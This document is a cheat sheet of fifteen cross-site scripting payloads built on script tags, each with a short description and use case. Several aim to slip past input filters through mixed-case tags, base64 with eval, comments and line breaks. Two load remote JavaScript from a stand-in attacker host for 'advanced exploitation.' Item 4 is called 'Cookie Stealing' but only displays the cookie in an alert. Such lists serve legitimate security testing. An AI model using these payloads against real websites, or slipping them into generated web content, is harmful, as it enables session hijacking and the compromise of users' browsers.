# XSS Script Tag Payloads

----------------------------------------
1. Basic Script
Payload: <script>alert(1)</script>
Description: Executes simple JavaScript alert.
Use Case: Basic XSS testing when <script> is allowed.

----------------------------------------
2. String Alert
Payload: <script>alert('XSS')</script>
Description: Alert with string output.
Use Case: Helps confirm reflected/stored XSS visually.

----------------------------------------
3. Double Quotes
Payload: <script>alert("XSS")</script>
Description: Uses double quotes.
Use Case: Bypass filters targeting single quotes.

----------------------------------------
4. Cookie Stealing
Payload: <script>alert(document.cookie)</script>
Description: Accesses cookies.
Use Case: Demonstrates session hijacking risk.

----------------------------------------
5. URL Disclosure
Payload: <script>alert(window.location)</script>
Description: Displays current URL.
Use Case: Useful in testing DOM-based XSS.

----------------------------------------
6. Uppercase Tag
Payload: <SCRIPT>alert(1)</SCRIPT>
Description: Uses uppercase tags.
Use Case: Bypass case-sensitive filters.

----------------------------------------
7. Mixed Case
Payload: <ScRiPt>alert(1)</sCrIpT>
Description: Random casing.
Use Case: Bypass weak sanitization filters.

----------------------------------------
8. Confirm Box
Payload: <script>confirm(1)</script>
Description: Uses confirm popup.
Use Case: Alternative execution indicator.

----------------------------------------
9. Prompt Box
Payload: <script>prompt(1)</script>
Description: Uses prompt popup.
Use Case: Confirms deeper JS execution capability.

----------------------------------------
10. External Script
Payload: <script src="http://attacker.com/xss.js"></script>
Description: Loads external JS file.
Use Case: Used for advanced exploitation (payload hosting).

----------------------------------------
11. Broken Syntax Bypass
Payload: <script/src="http://attacker.com/xss.js"></script>
Description: Alternative script loading syntax.
Use Case: Bypass poorly written filters.

----------------------------------------
12. Encoded Payload
Payload: <script>eval(atob('YWxlcnQoMSk='))</script>
Description: Base64 encoded JavaScript.
Use Case: Bypass filters detecting keywords like "alert".

----------------------------------------
13. Delayed Execution
Payload: <script>setTimeout(function(){alert(1)},100)</script>
Description: Executes after delay.
Use Case: Bypass timing-based filters.

----------------------------------------
14. Comment Obfuscation
Payload: <script>/* */alert(1)//</script>
Description: Uses comments to hide code.
Use Case: Bypass simple pattern detection filters.

----------------------------------------
15. Multi-line Script
Payload:
<script>
alert(1)
</script>
Description: Script across multiple lines.
Use Case: Bypass filters expecting single-line input.

----------------------------------------